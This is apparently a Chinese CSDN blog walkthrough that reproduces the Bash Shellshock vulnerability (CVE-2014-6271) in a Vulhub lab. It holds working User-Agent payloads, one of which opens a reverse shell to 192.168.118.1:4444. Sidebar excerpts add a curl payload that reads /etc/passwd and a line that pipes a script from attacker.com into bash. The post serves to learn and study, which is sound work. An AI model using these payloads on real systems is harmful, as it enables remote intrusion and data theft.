vulhub漏洞复现之bash(Shellshock CVE-2014-6271)

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量1.2k 收藏 3
点赞数
文章标签: bash 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/110233234
版权

Shellshock 破壳漏洞 CVE-2014-6271

1.漏洞概述:
GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。
2.漏洞影响:GNU Bash <= 4.3
3.漏洞复现:
Vulhub搭建靶场,
在这里插入图片描述

进入靶场
在这里插入图片描述

通过bp抓包,修改User-Agent,
User-Agent: () { :;};echo ; echo; echo $(/bin/ls /);
在这里插入图片描述

反弹shell来一个。还是修改User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1;
nc监听,反弹成功

在这里插入图片描述

Lin冲啊
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
破壳漏洞(ShellShock)官方修补补丁(2014.10.05)
10-13
修补了包括CVE-2014-6271(最原始的破壳漏洞)、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277和CVE-2014-6278。这些Bash漏洞现在都是破壳漏洞集中的,目前所有补丁,截止2014.10.05的官方补丁已经全部修补完成。压缩包内有一个检测脚本,只针对前几个流传广泛的6271、7169、7186等检测,后面几个没有检测。感兴趣的可以试一试。没有积分的可以去官网下载,这个是官方补丁整理后的,适合下载手动修补研究的。修补命令为: for BP in `ls bash43-*|grep -v sig`; do patch -p0 < $BP; done ./configure sudo make sudo make install
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
weixin_45095113的博客
12-21 411
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
最新发布
小司机的奥拓
04-23 1430
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhubshellshock-bash破壳漏洞复现与利用
qq_45300786的博客
09-13 795
详细说明请看 https://www.cnblogs.com/cute-puli/p/14649873.html 楼主这里只做实验 3个exp exp1 curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi exp2 User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id exp3 User-
靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权
YouthBelief的博客
02-11 2908
靶机练习 No.23 Vulnhub靶机DarkHole 20x00 环境准备0x01 信息收集步骤一:ip 探测步骤二 :端口扫描0x02 漏洞挖掘思路一:web漏洞挖掘(.git信息收集)思路二:22ssh 爆破步骤一:githack.py收集.git步骤二:从git仓库审查代码及数据库文件(1)config/config.php(2)审计index.php login.php dashboard.php步骤三:git-dumper查看git log记录(1)脚本递归下载git目录(2)git log
Vulhub靶场-shellshock漏洞复现
weixin_53696027的博客
06-02 215
通过Vulhub复现shellshock漏洞
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 445
Shellshock远程命令注入
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2930
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
详解ShellShock 漏洞复现原理,内附ShellShock的修复方法
Anprou的博客
05-31 6607
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
【靶场补充】项目十二补充(shellshock原理)
人间体佐菲的博客
09-12 660
shellshock
漏洞分析——shellshock实验
郭同学如是说
04-15 1699
Shellshock Attack Lab 前导知识 SHELL:命令行界面的解释器 Linux下常见Shell: Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin/ksh) Bourne Again Shell(/bin/bash) 查看目前使用的shell是否是/bin/bash: seed@ubuntu:/usr/lib/cgi-bin$ echo $SHELL /bin/bash vim编
幽灵(GHOST)的高危安全漏洞,GNU Bash 漏洞CVE-2014-6271
10-09
bash-4.1.2-15.el6_5.2.x86_64.rpm,glibc-2.12-1.149.el6_6.5.x86_64,glibc-common-2.12-1.149.el6_6.5.x86_64.rpm,bash-4.1.2-15.el6_5.2.x86_64.rpm
CVE-2014-7169 漏洞更新
10-23
已成功更新Red Hat Enterprise Linux Server release 5.5 (Tikanga)。
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug)
05-25
用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) 示例:$ ./...
bash(CVE-2014-6271) shellshock-破壳漏洞复现
weixin_45095113的博客
01-03 494
bash(CVE-2014-6271) shellshock-破壳漏洞复现
Vulhub漏洞靶场搭建
qq_53058639的博客
03-13 1070
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
Bash破壳漏洞
weixin_33911824的博客
07-30 216
“破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳”漏洞漏洞Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值